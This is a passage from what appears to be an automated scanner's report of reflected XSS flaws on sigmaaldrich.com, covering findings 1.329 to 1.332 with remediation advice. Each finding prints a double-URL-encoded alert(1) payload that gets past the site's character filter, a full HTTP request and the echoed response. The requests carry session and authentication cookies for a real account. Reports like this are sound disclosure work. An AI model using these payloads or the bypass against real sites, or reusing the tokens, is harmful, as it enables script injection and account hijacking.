Path:   /etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19e7c%2522%253balert%25281%2529%252f%252fd44eb148b23 was submitted in the REST URL parameter 2. This input was echoed as 19e7c";alert(1)//d44eb148b23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib19e7c%2522%253balert%25281%2529%252f%252fd44eb148b23/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:28 GMT
Content-Length: 29019
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib19e7c";alert(1)//d44eb148b23/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf","E404") ;
   </script>
...[SNIP]...

1.329. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea80%2522%253balert%25281%2529%252f%252ff4e4d5d292a was submitted in the REST URL parameter 3. This input was echoed as bea80";alert(1)//f4e4d5d292a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docsbea80%2522%253balert%25281%2529%252f%252ff4e4d5d292a/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:38 GMT
Content-Length: 29019
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docsbea80";alert(1)//f4e4d5d292a/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf","E404") ;
   </script>
...[SNIP]...

1.330. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54dd7%2522%253balert%25281%2529%252f%252fef9e5e5d4d4 was submitted in the REST URL parameter 4. This input was echoed as 54dd7";alert(1)//ef9e5e5d4d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma54dd7%2522%253balert%25281%2529%252f%252fef9e5e5d4d4/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:45 GMT
Content-Length: 29019
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma54dd7";alert(1)//ef9e5e5d4d4/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf","E404") ;
   </script>
...[SNIP]...

1.331. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6828%2522%253balert%25281%2529%252f%252f37dfc2a246 was submitted in the REST URL parameter 5. This input was echoed as a6828";alert(1)//37dfc2a246 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Informationa6828%2522%253balert%25281%2529%252f%252f37dfc2a246/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:47 GMT
Content-Length: 29018
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Sigma/General_Informationa6828";alert(1)//37dfc2a246/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf","E404") ;
   </script>
...[SNIP]...

1.332. http://www.sigmaaldrich.com/etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Sigma/General_Information/vol_issue22_proteoprep20.Par.0001.File.tmp/vol_issue22_proteoprep20.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26eab%2522%253balert%25281%2529%252f%252f8e4dd57ad27 was submitted in the REST URL parameter 6. This input was echoed as 26eab";alert(1)//8e4dd57ad27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Sigma/General_Information/26eab%2522%253balert%25281%2529%252f%252f8e4dd57ad27/vol_issue22_proteoprep20.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:49 GMT
Content-Length: 28977
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
